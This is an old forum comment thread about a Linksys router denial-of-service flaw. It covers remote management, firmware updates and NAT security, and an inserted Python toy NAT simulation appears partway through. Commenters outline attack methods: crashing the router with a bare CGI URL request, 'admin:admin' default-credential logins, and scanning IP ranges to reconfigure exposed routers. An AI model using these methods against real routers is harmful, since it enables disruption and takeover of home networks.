
nautical9 (469723) | more than 11 years ago | (#4614679)

It wouldn't take much to flood a DSL line with enough traffic to render it useless, no matter what router is on the home user's end. Only the ISP's routers could block a DoS attack like that.

Re:DoS? Who cares? (1)

updog (608318) | more than 11 years ago | (#4614873)

This DoS attack is not about flooding the DSL line with traffic; rather, it's caused by requesting a specific URL from the router:

To cause a crash, an attacker only needs to enter the URL (uniform resource locator) for a CGI (Common Gateway Interface) script used to configure and manage the router without providing any "arguments" (input for the script to process), according to iDefense.

in a related story ..... (5, Funny)

frovingslosh (582462) | more than 11 years ago | (#4614680)

If you leave your car unlocked with the keys in the ignition in N.Y.C., it's at risk.

What a lame report! The sparse on details is that the remote management feature is not enabled by default. Well, doh!, if I turn on remote management someone can get in and affect my system (particularly if I don't change the password). Imagine that!

Remote Access Management On By Default? (0)

Anonymous Coward | more than 11 years ago | (#4614704)

"However, if the router has a 'remote management' feature enabled, a malicious hacker could execute an attack from anywhere on the Internet by entering the IP (Internet Protocol) address of the router along with the name of the script into his or her Web browser."

This comes under the "Duh..." category. Why would anyone allow Remote Management Access on their router (or computer, for that matter) without a specific need for such a functionality and additional safeguards in place? Oh, I suppose that possibly the firmware had RMA "on" by default ....

This isn't that big of deal, there's been worse. (0)

Anonymous Coward | more than 11 years ago | (#4614707)

You still need the password anyway.
With the password they could just hit 'disconnect'. It's not THAT big of a deal.

I informed linksys of a far worse DoS that affected a default setting, even with remote access disabled, over a year ago. I never published it, but was very close to, since they were so rude on the phone and never responded to my emails.

A direct quote from one of the guys I was passed the phone to (after going through 3 bozos)

The guy asked me what linux kernel I was running, I told him that has nothing to do with the router. After more bizarre questions, he finally says "Yeah, so it probably has a problem. It's just a home router you know? It's not for production or anything."

Nutty. However it was fixed in the next firmware.

This one iDefense just published: A. Doesn't affect a default install and B. You need the password. If the attacker has your password, you have more to worry about than a silly DoS.

Re:This isn't that big of deal, there's been worse. (0)

Anonymous Coward | more than 11 years ago | (#4614770)

Yes. From iDefense [idefense.com] :

"Because successful exploitation requires password authentication, exploitation can only occur in two likely scenarios:

1.) The Linksys user is socially engineered into clicking on a link and authenticating to the router (e.g. "Check out this cool Linksys Easter Egg! Click here!")

2.) The Linksys user is logged into the router's web management console, and is the victim of a cross site scripting attack which redirects the user to this link."

Then the real problem is that Joe consumer was socially engineered, didn't change the default admin name and password, or is otherwise clueless. This is news?

why would anyone have remote-management enabled? (2)

lingqi (577227) | more than 11 years ago | (#4614717)

I mean, seriously, enlighten me here: why in the world would you want to remotely manage your *cheap* router?

"*in case i forgot to configure something before i went out" is not a good answer, by the way.

you will have more problems than DoS if you have the remote-configure enabled anyway - instead of a boring little DoS, I would try to crack the password and put all your computers in the demilitarized zone (is that what they call it these days?) and then try to break into your windows boxes (or linux or whatever). I bet half the people out there (probably more) never even changed the default password on their routers.

Sigh... this is such a non-issue. I can't believe I am wasting a whole 5 minutes yapping about it.

Re:why would anyone have remote-management enabled (2)

jonnythan (79727) | more than 11 years ago | (#4614801)

"*in case i forgot to configure something before i went out" is not a good answer, by the way.

Why not? Just today I realized that since I had upgraded my router's firmware, I had not opened the ssh ports to the OpenBSD box behind it.. and there were some files on that box I needed to put up for download from work.

So, I logged into the router, opened port 22 to the OBSD box, and then proceeded to ssh into it. This was a lifesaver.

Re:why would anyone have remote-management enabled (1)

soulctcher (581951) | more than 11 years ago | (#4614850)

That's a PERFECT example. Most of my remote management comes from port forwarding. Came in handy a number of times.

But... (2)

Ironica (124657) | more than 11 years ago | (#4614729)

What you're all forgetting is, this is only an issue if you have remote management enabled, and it's not enabled by default...

(Seriously, does anyone read a thread before they post anymore?)

I'm glad they posted this. Eventually I'll go over to my mom's house and upgrade her firmware. I can't really see her crashing her own router... well, not on purpose, anyway. She might by accident trying to go to Yahoo! (which is what she calls whatever browser she happens to be using, unless it's AOL. No, not net savvy.)

SMC (0, Flamebait)

awerg (201320) | more than 11 years ago | (#4614731)

Thank god I got a SMC router instead of a Linksys!

Does that mean that my win2k, winXP and win98 machines are safe now?

Mac OS Instructions (5, Informative)

Daleks (226923) | more than 11 years ago | (#4614734)

LinkSys only offers a specialized Windows firmware upgrading tool. The router itself has a Java applet that is supposed to work, but didn't for me in Mozilla 1.2b or IE 5.2.2. A friend directed me here [mactechnologies.com] . It has instructions on how to upgrade the firmware in Mac OS 9/X using their specialized tool. It worked for me.

Another one to add to this list (3, Informative)

indiigo (121714) | more than 11 years ago | (#4614748)

In one firmware update last year, the "WAN UPDATE" setting was defaulted to yes. This would enable anyone to connect to a linksys router and update the configuration to their heart's content, or write a script to scan through an IP range and automate it.

I reported this to linksys, they quickly gave me another firmware update, but other users reported the same thing.

http://arstechnica.infopop.net/OpenTopic/page?a=tpc&s=50009562&f=469092836&m=5300962863

Linksys vulnerabilities (2)

Animats (122034) | more than 11 years ago | (#4614750)

That particular router comes with no password as default, which makes it very vulnerable, because it will accept a TFTP firmware download from the WAN side. I don't know that anyone has bothered to write exploit firmware for the thing, but someone could send it a junk file via TFTP and lock it up.

Linksys firmware since February 2002 has been reasonably decent. Early versions would crash about once a day in normal operation.

What about other similar products? (1)

tyrelb (619467) | more than 11 years ago | (#4614766)

Many other products both software firewalls (i.e. for Windows) and hardware routers (i.e. my D-Link) include an option for remote admin.

If users were to enable remote admin on these products, would they not be just as vulnerable too?

It seems to me that home products may not require the remote admin feature. I never use mine, and I'm still alive!

Update without Windows client? (2)

Charles Dodgeson (248492) | more than 11 years ago | (#4614790)

Anyone spot any instructions on getting a Unixish tftp to do whatever authentication is necessary to update?

It's not all that urgent for me, since however idiotic I might be, I made doubly sure when I set the thing up that remote management was disabled. Imagine all the "http://admin:admin@address/" attempts there'd be otherwise.

This has been out for weeks! (2)

Newer Guy (520108) | more than 11 years ago | (#4614792)

Yes, there's a DoS possibility in the Linksys routers. It's fixed in the 1.43 firmware release. Anyone who reads the Linksys forum at DSL Reports has known about this for weeks!

NAT with no firewall ? (0, Offtopic)

Graspee_Leemoor (302316) | more than 11 years ago | (#4614803)

Slightly on-topic can anyone tell me what vulnerabilities exist if you are running a DSL router using NAT but no firewall ?

I have a small to fair amount of TCP/IP knowledge and at the moment my thinking is that you are only really vulnerable to DOS attacks.

I mean, if you aren't forwarding any ports then the only time there is a chink in your armour is when you have a temporary alias set up for a connection, which will be one port on one of the machines on your LAN. This alias won't last for long, and it will be on a port you're using for getting out, e.g. port 80,125... and you'd probably have to set your firewall up to allow this through if you ran a firewall.

Normally if a packet comes in to your sole external ip address and you haven't set up any port forwarding (or you have but it's not one of the ports you want to forward), the DSL router will just drop the packet.

Can anyone please clue me in on the vulnerabilities of using NAT alone and no firewall ?

graspee
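The translation-table reasoning in the comment above, as an added example that is not part of the original post: a toy NAT that drops unsolicited inbound packets, honours port forwards, and expires mappings. It goes beyond the comment by modelling two filtering behaviours (endpoint-dependent and endpoint-independent, in RFC 4787 terms); which one a given router uses is not stated on the page, and all class names, addresses and ports are constructed.

```python
class Nat:
    """Toy NAT: tracks outbound mappings and decides the fate of inbound packets."""

    def __init__(self, restrict_by_remote=True, ttl=60):
        self.restrict = restrict_by_remote  # True: only the contacted peer may reply
        self.ttl = ttl                      # seconds a mapping stays alive
        self.forwards = {}                  # public_port -> (lan_ip, lan_port)
        self.mappings = {}                  # public_port -> mapping record
        self.next_port = 40000

    def outbound(self, lan_ip, lan_port, remote_ip, remote_port, now):
        """A LAN host opens a connection; return the public port allocated."""
        port = self.next_port
        self.next_port += 1
        self.mappings[port] = {"lan": (lan_ip, lan_port),
                               "remote": (remote_ip, remote_port),
                               "expires": now + self.ttl}
        return port

    def inbound(self, src_ip, src_port, public_port, now):
        """Return the LAN (ip, port) that receives the packet, or None if dropped."""
        if public_port in self.forwards:        # static forward: always delivered
            return self.forwards[public_port]
        m = self.mappings.get(public_port)
        if m is None or now > m["expires"]:     # no mapping, or the alias timed out
            self.mappings.pop(public_port, None)
            return None
        if self.restrict and (src_ip, src_port) != m["remote"]:
            return None                         # stranger reusing the open alias
        return m["lan"]


def demo():
    """Run the same four inbound packets against both filtering behaviours."""
    results = {}
    for name, strict in (("endpoint-dependent", True),
                         ("endpoint-independent", False)):
        nat = Nat(restrict_by_remote=strict)
        port = nat.outbound("192.168.1.10", 51000, "203.0.113.5", 80, now=0)
        results[name] = {
            "reply_from_server": nat.inbound("203.0.113.5", 80, port, now=1),
            "stranger_same_port": nat.inbound("198.51.100.9", 4444, port, now=1),
            "unsolicited_port_22": nat.inbound("198.51.100.9", 4444, 22, now=1),
            "after_timeout": nat.inbound("203.0.113.5", 80, port, now=120),
        }
    return results
```

With endpoint-independent filtering the temporary alias accepts packets from any source while it lives, so a host-level firewall still matters behind that kind of NAT.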

could be the first in a line of problems (3, Insightful)

inepom01 (525367) | more than 11 years ago | (#4614854)

I think this is the first or one of the first times we hear of one of these small router/NAT devices having vulnerabilities. This one is not very serious as it will only crash the device rather than allow someone to gain access to the network, but both this and other devices may have holes that would allow hackers to gain access to home LANs.
This could be a serious problem in the coming future with these small routers/NATers being combined with wireless APs for everyone to use AIM from the couch. Great and all but people with these things are probably going to bother even less with security than they do now, thereby introducing a whole host of nasty little attacks.
This should be interesting to watch for.